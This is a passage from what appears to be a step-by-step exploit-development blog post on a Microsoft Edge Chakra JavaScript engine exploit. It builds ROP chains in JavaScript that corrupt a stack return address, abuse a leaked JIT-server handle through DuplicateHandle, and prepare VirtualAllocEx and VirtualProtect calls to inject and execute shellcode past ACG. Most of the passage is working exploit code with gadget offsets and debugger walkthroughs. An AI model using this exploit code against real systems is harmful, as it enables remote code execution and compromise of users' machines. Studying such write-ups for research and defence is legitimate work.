    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
    inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// alert() for debugging
	alert("DEBUG");

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Before I explain the reasoning behind the ROP chain, let me say just two things:

  1. Notice that we incremented countMe by 0x50 bytes after we wrote our shellcode. This is to ensure that our ROP chain and shellcode don’t collide and we have a noticeable gap between them, so we can differentiate where the shellcode stops and the ROP chain begins
  2. You can generate ROP gadgets for chakra.dll with the rp++ utility leveraged in the first blog post. Here is the command: rp-win-x64.exe -f C:\Windows\system32\chakra.dll -r 5 > C:\PATH\WHERE\YOU\WANT\TO\STORE\ROP\GADGETS\FILENAME.txt. Again, this is outlined in part two. From here you now will have a list of ROP gadgets from chakra.dll.

Now, let’s explain this ROP chain.

This ROP chain will not be executed anytime soon, nor will it be executed within the content process (where the exploit is being detonated). Instead, this ROP chain and our shellcode will be injected into the JIT process (where ACG is disabled). From there we will hijack execution of the JIT process and force it to execute our ROP chain. The ROP chain (when executed) will:

  1. Setup a call to VirtualProtect and mark our shellcode allocation as RWX
  2. Jump to our shellcode and execute it

Again, this is all done within the JIT process. Another remark on the ROP chain - we can notice a few interesting things, such as the lpAddress parameter. According to the documentation of VirtualProtect this parameter:

The address of the starting page of the region of pages whose access protection attributes are to be changed.

So, based on our exploitation plan, we know that this lpAddress parameter will be the address of our shellcode allocation, once it is injected into the JIT process. However, the dilemma is the fact that at this point in the exploit we have not injected any shellcode into the JIT process (at the time of our ROP chain and shellcode being stored in the content process). Therefore there is no way to fill this parameter with a correct value at the current moment, as we have yet to call VirtualAllocEx to actually inject the shellcode into the JIT process. Because of this, we setup our ROP chain as follows:

(...)truncated(...)

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();

According to the __fastcall calling convention, the lpAddress parameter needs to be stored in the RCX register. However, we can see our ROP chain, as it currently stands, will only pop the value of 0 into RCX. We know, however, that we need the address of our shellcode to be placed here. Let me explain how we will reconcile this (we will step through all of this code when the time comes, but for now I just want to make this clear to the reader as to why our final ROP chain is only partially completed at the current moment).

  1. We will use VirtualAllocEx and WriteProcessMemory to allocate and write our shellcode into the JIT process with our first few ROP chains of our exploit.
  2. VirtualAllocEx will return the address of our shellcode within the JIT process
  3. When VirtualAllocEx returns the address of the remote allocation within the JIT process, we will use a call to WriteProcessMemory to write the actual address of our shellcode in the JIT process (which we now have because we injected it with VirtualAllocEx) into our final ROP chain (which currently is using a “blank placeholder” for lpAddress).

Lastly, we know that our final ROP chain (the one we are storing and updating with the aforesaid steps) not only marks our shellcode as RWX, but it is also responsible for returning into our shellcode. This can be seen in the below snippet of the VirtualProtect ROP chain.

(...)truncated(...)

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

Again, we are currently using a blank “parameter placeholder” in this case, as our VirtualProtect ROP chain doesn’t know where our shellcode was injected into the JIT process (as it hasn’t happened at this point in the exploitation process). We will be updating this eventually. For now, let me summarize briefly what we are doing:

  1. Storing shellcode + VirtualProtect ROP chain with the .data section of chakra.dll (in the JIT process)
  2. These items will eventually be injected into the JIT process (where ACG is disabled).
  3. We will hijack control-flow execution in the JIT process to force it to execute our ROP chain. Our ROP chain will mark our shellcode as RWX and jump to it
  4. Lastly, our ROP chain is missing some information, as the shellcode hasn’t been injected. This information will be reconcicled with our “long” ROP chains that we are about to embark on in the next few sections of this blog post. So, for now, the “final” VirtualProtect ROP chain has some missing information, which we will reconcile on the fly.

Lastly, before moving on, let’s see how our shellcode and ROP chain look like after we execute our exploit (as it currently is).

After executing the script, we can then (before we close the dialogue) attach WinDbg to the content process and examine chakra_base + 0x74b000 to see if everything was written properly.

As we can see, we have successfully stored our shellcode and ROP chain (which will be executed in the future).

Let’s now start working on our exploit in order to achieve execution of our final ROP chain and shellcode.

DuplicateHandle ROP Chain

Before we begin, each ROP gadget I write has an associated commetn. My blog will sometimes cut these off when I paste a code snippet, and you might be required to slide the bar under the code snippet to the right to see comments.

We have, as we have seen, already prepared what we are eventually going to execute within the JIT process. However, we still have to figure out how we are going to inject these into the JIT process, and begin code execution. This journey to this goal begins with our overwritten return address, causing control-flow hijacking, to start our ROP chain (just like in part two of this blog series). However, instead of directly executing a ROP chain to call WinExec, we will be chaining together multiple ROP chains in order to achieve this goal. Everything that happens in our exploit now happens in the content process (for the foreseeable future).

A caveat before we begin. Everything, from here on out, will begin at these lines of our exploit:

// alert() for debugging
alert("DEBUG");

// Corrupt the return address to control RIP with 0x4141414141414141
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

We will start writing our ROP chain where the Corrupt the return address to control RIP with 0x4141414141414141 comment is (just like in part two). Additionally, we are going to truncate (from here on out, until our final code) everything that comes before our alert() call. This is to save space in this blog post. This is synonymous from what we did in part two. So again, nothing that comes before the alert() statement will be changed. Let’s begin now.

As previously mentioned, it is possible to obtain a PROCESS_ALL_ACCESS handle to the JIT server by abusing the PROCESS_DUP_HANDLE handle stored in s_jitManager. Using our stack control, we know the next goal is to instrument a ROP chain. Although we will be leveraging multiple chained ROP chains, our process begins with a call to DuplicateHandle - in order to retrieve a privileged handle to the JIT server. This will allow us to compromise the JIT server, where ACG is disabled. This call to DuplicateHandle will be as follows:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS
);

With this in mind, here is how the function call will be setup via ROP:

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

Before stepping through our ROP chain, notice the first thing we do is read the JIT server handle:

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

After reading in and storing this value, we can begin our ROP chain. Let’s now step through the chain together in WinDbg. As we can see from our DuplicateHandle ROP chain, we are overwriting RIP (which we previously did with 0x4141414141414141 in our control-flow hijack proof-of-concept via return address overwrite) with a ROP gadget of pop rdx ; ret, which is located at chakra_base + 0x1d2c9. Let’s set a breakpoint here, and detonate our exploit. Again, as a point of contention - the __fastcall calling convention is in play - meaning arguments go in RCX, RDX, R8, R9, RSP + 0x20, etc.

After hitting the breakpoint, we can inspect RSP to confirm our ROP chain has been written to the stack.

Our first gadget, as we know, is a pop rdx ; ret gadget. After execution of this gadget, we have stored a pseudo-handle with PROCESS_ALL_ACCESS into RDX.

This brings our function call to DuplicateHandle to the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	-
	-
	-
	-
	-
);

Our next gadget is mov r8, rdx ; add rsp, 0x48 ; ret. This will copy the pseudo-handle currently in RDX into R8 also.

We should also note that this ROP gadget increments the stack by 0x48 bytes. This is why in the ROP sequence we have 0x4141414141414141 padding “opcodes”. This padding is here to ensure that when the ret happens in our ROP gadget, execution returns to the next ROP gadget we want to execute, and not 0x48 bytes down the stack to a location we don’t intend execution to go to:

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

This brings our DuplicateHandle call to the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	-
	-
	-
	-
);

The next ROP gadget sequence contains an interesting item. The next item on our agenda will be to provide DuplicateHandle with an “output buffer” to write the new duplicated-handle (when the call to DuplicateHandle occurs). We achieve this by providing a memory address, which is writable, in R9. The address we will use is an empty address within the .data section of chakra.dll. We achieve this with the following ROP gadget:

mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret

As we can see, we load the address we want to place in R9 within RCX. The mov r9, rcx instruction will load our intended “output buffer” within R9, setting up our call to DuplicateHandle properly. However, there are some residual instructions we need to deal with - most notably the cmp r8d, [rax] instruction. As we can see, this instruction will dereference RAX (e.g. extract the contents that the value in RAX points to) and compare it to r8d. We don’t necessarily care about the cmp instruction so much as we do about the fact that RAX is dereferenced. This means in order for this ROP gadget to work properly, we need to load a valid pointer in RAX. In this exploit, we just choose a random address within the chakra.dll address space. Do not over think as to “why did Connor choose this specific address”. This could literally be any address!

As we can see, RAX now has a valid pointer in it. Moving our, our next ROP gadget is a pop rcx ; ret gadget. As previously mentioned, we load the actual value we want to pass into DuplicateHandle via the R9 register into RCX. A future ROP gadget will copy RCX into the R9 register.

Our .data address of chakra.dll is loaded into RCX. This memory address is where our PROCESS_ALL_ACCESS handle to the JIT server will be located after our call to DuplicateHandle.

Now that we have prepared RAX with a valid pointer and prepared RCX with the address we want DuplicateHandle to write our PROCESS_ALL_ACCESS handle to, we hit the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget.

We have successfully copied our output “buffer”, which will hold our full-permissions handle to the JIT server after the DuplicateHandle call into R9. Next up, we can see the cmp r8d, dword ptr [rax] instruction. WinDbg now shows that the dereferenced contents of RAX contains some valid contents - meaning RAX was successfully prepared with a pointer to “bypass” this cmp check. Essentially, we ensure we don’t incur an access violation as a result of an invalid address being dereferenced by RAX.

The next item on the agenda is the je instruction - which essentially performs the jump to the specified address above (chakra!Js::InternalStringComparer::Equals+0x28) if the result of subtracting EAX, a 32-bit register (referenced via dword ptr [rax], meaning essentially EAX) from R8D (a 32-bit register) is 0. As we know, we already prepared R8 with a value of 0xffffffffffffffff - meaning the jump won’t take place, as 0xffffffffffffffff - 0x7fff3d82e010 does not equal zero. After this, an add rsp, 0x28 instruction occurs - and, as we saw in our ROP gadget snippet at the beginning of this section of the blog, we pad the stack with 0x28 bytes to ensure execution returns into the next ROP gadget, and not into something we don’t intend it to (e.g. 0x28 bytes “down” the stack without any padding).

Our call to DuplicateHandle is now at the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	-
	-
	-
);

Since RDX, R8, and R9 are taken care of - we can finally fill in RCX with the handle to the JIT server that is currently within the s_jitManager. This is an “easy” ROP sequence - as the handle is stored in a global variable s_jitManager + 0x8 and we can just place it on the stack and pop it into RCX with a pop rcx ; ret gadget. We have already used our arbitrary read to leak the raw handle value (in this case it is 0xa64, but is subject to change on a per-process basis).

You may notice above the value of the stack changed. This is simply because I restarted Edge, and as we know - the stack changes on a per-process basis. This is not a big deal at all - I just wanted to make note to the reader.

After the pop rcx instruction - the PROCESS_DUP_HANDLE handle to the JIT server is stored in RCX.

Our call to DuplicateHandle is now at the following state:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	-
	-
	-
);

Per the __fastcall calling convention, every argument after the first four are placed onto the stack. Because we have an arbitrary write primitive, we can just directly write our next 3 arguments for DuplicateHandle to the stack - we don’t need any ROP gadgets to pop any further arguments. With this being said, we will go ahead and continue to use our ROP chain to actually place DuplicateHandle into the RAX register. We then will perform a jmp rax instruction to kick our function call off. So, for now, let’s focus on getting the address of kernelbase!DuplicateHandle into RAX. This begins with a pop rax instruction. As we can see below, RAX, after the pop rax, contains kernelbase!DuplicateHandle.

After RAX is filled with kernelbase!DuplicateHandle, the jmp rax instruction is queued for execution.

Let’s quickly recall our ROP chain snippet.

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

Let’s break down what we are seeing above:

  1. RAX contains kernelbase!DuplicateHandle
  2. kernelbase!DuplicateHandle is a function. When it is called legitimately, it ends in a ret instruction to return execution to where it was called (this is usually a return to the stack)
  3. Our “return” address jumps over our “shadow space”. Remember, __fastcall requires the 5th parameter, and subsequent parameters, begin at RSP + 0x20, RSP + 0x28, RSP + 0x38, etc. The space between RSP and RSP + 0x20, which is unused, is referred to as “shadow space”
  4. Our final three parameters are written directly to the stack

Step one is very self explanatory. Let’s explain steps two through four quickly. When DuplicateHandle is called legitimately, execution can be seen below.

Prior to the call:

After the call:

Notice what our call instruction does under the hood. call pushes the return address on the stack for DuplicateHandle. When this push occurs, it also changes the state of the stack so that every item is pushed down 0x8 bytes. Essentially, when call happens RSP becomes RSP + 0x8, and so forth. This is very important to us.

Recall that we do not actually call DuplicateHandle. Instead, we perform a jmp to it. Since we are using jmp, this doesn’t push a return address onto the stack for execution to return to. Because of this, we supply our own return address located at RSP when the jmp occurs - this “mimics” what call does. Additionally, this also means we have to push our last three parameters 0x8 bytes down the stack. Again, call would normally do this for us - but since call isn’t used here, we have to manually add our return address an manually increment the stack by 0x8. This is because although __fastcall requires 5th and subsequent parameters to start at RSP + 0x20, internally the calling convention knows when the call is performed, the parameters will actually be shifted by 0x8 bytes due to the pushed ret address on the stack. So tl;dr - although __fastcall says we put parameters at RSP + 0x20, we actually need to start them at RSP + 0x28.

The above will be true for all subsequent ROP chains.

So, after we get DuplicateHandle into RAX we then can directly write our final three arguments directly to the stack leveraging our arbitrary write primitive.

Our call to DuplicateHandle is in its final state:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS
);

From here, we should be able to step into the function call to DuplicateHandle, execute it.

We can use pt to tell WinDbg to execute DuplicateHandle and pause when we hit the ret to exit the function

At this point, our call should have been successful! As we see above, a value was placed in our “output buffer” to receive the duplicated handle. This value is 0x0000000000000ae8. If we run Process Hacker as an administrator, we can confirm that this is a handle to the JIT server with PROCESS_ALL_ACCESS!

Now that our function has succeeded, we need to make sure we return back to the stack in a manner that allows us to keep execution our ROP chain.

When the ret is executed we hit our “fake return address” we placed on the stack before the call to DuplicateHandle. Our return address will simply jump over the shadow space and our last three DuplicateHandle parameters, and allow us to keep executing further down the stack (where subsequent ROP chains will be).

At this point we have successfully obtained a PROCESS_ALL_ACCESS handle to the JIT server process. With this handle, we can begin the process of compromising the JIT process, where ACG is disabled.

VirtualAllocEx ROP Chain

Now that we possess a handle to the JIT server with enough permissions to perform things like memory operations, let’s now use this PROCESS_ALL_ACCESS handle to allocate some memory within the JIT process. However, before examining the ROP chain, let’s recall the prototype for VirtualAllocEx:

The function call will be as follows for us:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable
);

Let’s firstly break down why our call to VirtualAllocEx is constructed the way it is. The call to the function is very straight forward - we are essentially allocating a region of memory the size of our shellcode in the JIT process using our new handle to the JIT process. The main thing that sticks out to us is the PAGE_READWRITE allocation protection. As we recall, the JIT process doesn’t have ACG enabled - meaning it is quite possible to have dynamic RWX memory in such a process. However, there is a slight caveat and that is when it comes to remote injection. ACG is documented to let processes that don’t have ACG enabled to inject RWX memory into a process which does have ACG enabled. After all, ACG was created with Microsoft Edge in mind. Since Edge uses an out-of-process JIT server architecture, it would make sense that the process not protected by ACG (the JIT server) can inject into the process with ACG (the content process). However, a process with ACG cannot inject into a process without ACG using RWX memory. Because of this, we actually will place our shellcode into the JIT server using RW permissions. Then, we will eventually copy a ROP chain into the JIT process which marks the shellcode as RWX. This is 